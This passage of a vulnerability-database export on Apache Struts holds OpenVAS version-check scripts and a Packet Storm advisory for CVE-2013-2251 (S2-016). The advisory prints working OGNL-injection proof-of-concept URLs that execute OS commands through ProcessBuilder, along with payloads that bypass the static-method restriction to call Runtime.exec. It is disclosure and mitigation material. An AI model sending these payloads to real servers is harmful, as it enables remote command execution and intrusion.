\"^2\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.24\"))\n {\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.24.1\");\n security_message(data:report, port:appPort);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-07-17T14:24:36", "description": "This host is running Apache Struts and is\n prone to cross-site 
scripting vulnerability.", "cvss3": {}, "published": "2017-10-06T00:00:00", "type": "openvas", "title": "Apache Struts 'Problem Report' Cross-Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5169"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310812011", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812011", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts 'Problem Report' Cross-Site Scripting Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812011\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2015-5169\");\n script_bugtraq_id(76625);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-06 17:52:42 +0530 (Fri, 06 Oct 2017)\");\n ## Apache Struts contains a cross-site scripting vulnerability when devMode is left turned on\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Apache Struts 'Problem Report' Cross-Site Scripting Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to cross-site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an improper validation\n of input passed via the 'Problem Report' screen when using debug mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary script code in the browser of user in the context of the\n affected site.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Versions 2.0.0 through 2.3.16.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.20 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-025.html\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\nif(appVer =~ \"^2\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"2.0\", test_version2:\"2.3.16.3\"))\n {\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.20\");\n security_message(data:report, port:appPort);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-07-17T14:18:54", "description": "This host is running Apache Struts and is\n prone to security bypass vulnerability.", "cvss3": {}, "published": "2017-08-31T00:00:00", "type": "openvas", "title": "Apache Struts 'top' Object Access Security Bypass Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5209"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310811315", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_top_object_sec_bypass_vuln_win.nasl 63355 2016-11-18 11:00:43 +0530 Nov$\n#\n# Apache Struts 'top' Object Access Security Bypass Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the 
GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811315\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2015-5209\");\n script_bugtraq_id(82550);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-31 13:39:09 +0530 (Thu, 31 Aug 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Struts 'top' Object Access Security Bypass Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to security bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to due to an incorrect\n handling of the 'top' object in specially crafted request.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to\n bypass certain security restrictions and perform unauthorized actions. 
This may\n lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x before 2.3.24.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.24.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-026.html\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1033908\");\n script_xref(name:\"URL\", value:\"https://vuldb.com/?id.105878\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\nif(appVer =~ \"^2\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.24\"))\n {\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.24.1\");\n security_message(data:report, port:appPort);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-07-17T14:26:17", "description": "This host is running Apache Struts and is\n prone to unspecified vulnerability.", "cvss3": {}, "published": "2016-11-18T00:00:00", "type": "openvas", "title": "Apache Struts Unspecified Vulnerability Nov16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4436"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310809474", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809474", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_unspecified_vuln_nov16_win.nasl 63355 2016-11-18 11:00:43 +0530 Nov$\n#\n# Apache Struts Unspecified Vulnerability Nov16 (Windows)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809474\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2016-4436\");\n script_bugtraq_id(91280);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-11-18 11:00:43 +0530 (Fri, 18 Nov 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Struts Unspecified Vulnerability Nov16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", 
value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to the method used to clean\n up action name can produce vulnerable payload based on crafted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to\n bypass certain security restrictions and perform unauthorized actions. This may\n lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x before 2.3.29\n and 2.5.x before 2.5.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.29\n or 2.5.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-035.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\nif(appVer =~ \"^2\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.28.1\"))\n {\n fix = \"2.3.29\";\n VULN = TRUE ;\n }\n\n else if(version_is_equal(version:appVer, test_version:\"2.5\"))\n {\n fix = \"2.5.1\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix);\n security_message(data:report, port:appPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:27", "description": "", "cvss3": {}, "published": "2013-08-13T00:00:00", 
"type": "packetstorm", "title": "Struts2 2.3.15 OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2013-08-13T00:00:00", "id": "PACKETSTORM:122796", "href": "https://packetstormsecurity.com/files/122796/Struts2-2.3.15-OGNL-Injection.html", "sourceData": "`CVE Number: CVE-2013-2251 \nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability \nAffected Software: Apache Struts v2.0.0 - 2.3.15 \nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc. \nIssue Status: v2.3.15.1 was released which fixes this vulnerability \nIssue ID by Vender: S2-016 \n \nOverview: \nStruts2 is an open-source web application framework for Java. \nStruts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which \nleads to arbitrary Java method execution on the target server. This is \ncaused by insecure handling of prefixed special parameters (action:, \nredirect: and redirectAction:) in DefaultActionMapper class of Struts2. \n \nDetails: \n<About DefaultActionMapper> \n \nStruts2's ActionMapper is a mechanism for mapping between incoming HTTP \nrequest and action to be executed on the server. DefaultActionMapper is \na default implementation of ActionMapper. It handles four types of \nprefixed parameters: action:, redirect:, redirectAction: and method:. \n \nFor example, redirect prefix is used for HTTP redirect. \n \nNormal redirect prefix usage in JSP: \n<s:form action=\"foo\"> \n... \n<s:submit value=\"Register\"/> \n<s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/> \n</s:form> \n \nIf the cancel button is clicked, redirection is performed. \n \nRequest URI for redirection: \n/foo.action?redirect:http://www.google.com/ \n \nResopnse Header: \nHTTP/1.1 302 Found \nLocation: http://www.google.com/ \n \nUsage of other prefixed parameters is similar to redirect. \nSee Struts2 document for details. 
\nhttps://cwiki.apache.org/confluence/display/WW/ActionMapper \n \n<How the Attack Works> \n \nAs stated already, there are four types of prefixed parameters. \n \naction:, redirect:, redirectAction:, method: \n \nAll except for method: can be used for attacks. But regarding action:, \nit can be used only if wildcard mapping is enabled in configuration. \nOn the one hand, redirect: and redirectAction: are not constrained by \nconfiguration (thus they are convenient for attackers). \n \nOne thing that should be noted is that prefixed parameters are quite \nforceful. It means that behavior of application which is not intended \nto accept prefixed parameters can also be overwritten by prefixed \nparameters added to HTTP request. Therefore all Struts2 applications \nthat use DefaultActionMapper are vulnerable to the attack. \n \nThe injection point is name of prefixed parameters. \nExample of attack using redirect: is shown below. \n \nAttack URI: \n/bar.action?redirect:http://www.google.com/%25{1000-1} \n \nResponse Header: \nHTTP/1.1 302 Found \nLocation: http://www.google.com/999 \n \nAs you can see, expression (1000-1) is evaluated and the result (999) \nis appeared in Location response header. As I shall explain later, \nmore complex attacks such as OS command execution is possible too. \n \nIn DefaultActionMapper, name of prefixed parameter is once stored as \nActionMapping object and is later executed as OGNL expression. \nRough method call flow in execution phase is as the following. 
\n \norg.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter() \norg.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction() \norg.apache.struts2.dispatcher.Dispatcher.serviceAction() \norg.apache.struts2.dispatcher.StrutsResultSupport.execute() \norg.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse() \ncom.opensymphony.xwork2.util.TextParseUtil.translateVariables() \ncom.opensymphony.xwork2.util.OgnlTextParser.evaluate() \n \nProof of Concept: \n<PoC URLs> \n \nPoC is already disclosed on vender's web page. \nhttps://struts.apache.org/release/2.3.x/docs/s2-016.html \n \nBelow PoC URLs are just quotes from the vender's page. \n \nSimple Expression: \nhttp://host/struts2-blank/example/X.action?action:%25{3*4} \nhttp://host/struts2-showcase/employee/save.action?redirect:%25{3*4} \n \nOS Command Execution: \nhttp://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \nhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \nhttp://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \n \nObviously such attacks are not specific to blank/showcase application, \nbut all Struts2 based applications may be subject to attacks. \n \n<OS Command Execution and Static Method Call> \n \nAnother topic that I think worth mentioning is that PoC URLs use \nProcessBuilder class to execute OS commands. The merit of using this \nclass is that it does not require static method to execute OS commands, \nwhile Runtime class does require it. \n \nAs you may know, static method call in OGNL is basically prohibited. 
\nBut in Struts2 <= v2.3.14.1 this restriction was easily bypassed by \na simple trick: \n \n%{#_memberAccess['allowStaticMethodAccess']=true, \n@java.lang.Runtime@getRuntime().exec('your commands')} \n \nIn Struts v2.3.14.2, SecurityMemberAccess class has been changed to \nprevent the trick. However there are still some techniques to call \nstatic method in OGNL. \n \nOne technique is to use reflection to replace static method call to \ninstance method call. Another technique is to overwrite #_memberAccess \nobject itself rather than property of the object: \n \n%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true), \n@java.lang.Runtime@getRuntime().exec('your commands')} \n \nProbably prevention against static method is just an additional layer \nof defense, but I think that global objects such as #_memberAccess \nshould be protected from rogue update. \n \nTimeline: \n2013/06/24 Reported to Struts Security ML \n2013/07/17 Vender announced v2.3.15.1 \n2013/08/10 Disclosure of this advisory \n \nRecommendation: \nImmediate upgrade to the latest version is strongly recommended as \nactive attacks have already been observed. It should be noted that \nredirect: and redirectAction: parameters were completely dropped and \ndo not work in the latest version as stated in the vender's page. \nThus attention for compatibility issues is required for upgrade. \n \nIf you cannot upgrade your Struts2 immediately, filtering (by custom \nservlet filter, IPS, WAF and so on) can be a mitigation solution for \nthis vulnerability. Some points about filtering solution are listed \nbelow. \n \n- Both %{expr} and ${expr} notation can be used for attacks. \n- Parameters both in querystring and in request body can be used. \n- redirect: and redirectAction: can be used not only for Java method \nexecution but also for open redirect. \n \nSee S2-017 (CVE-2013-2248) for open redirect issue. 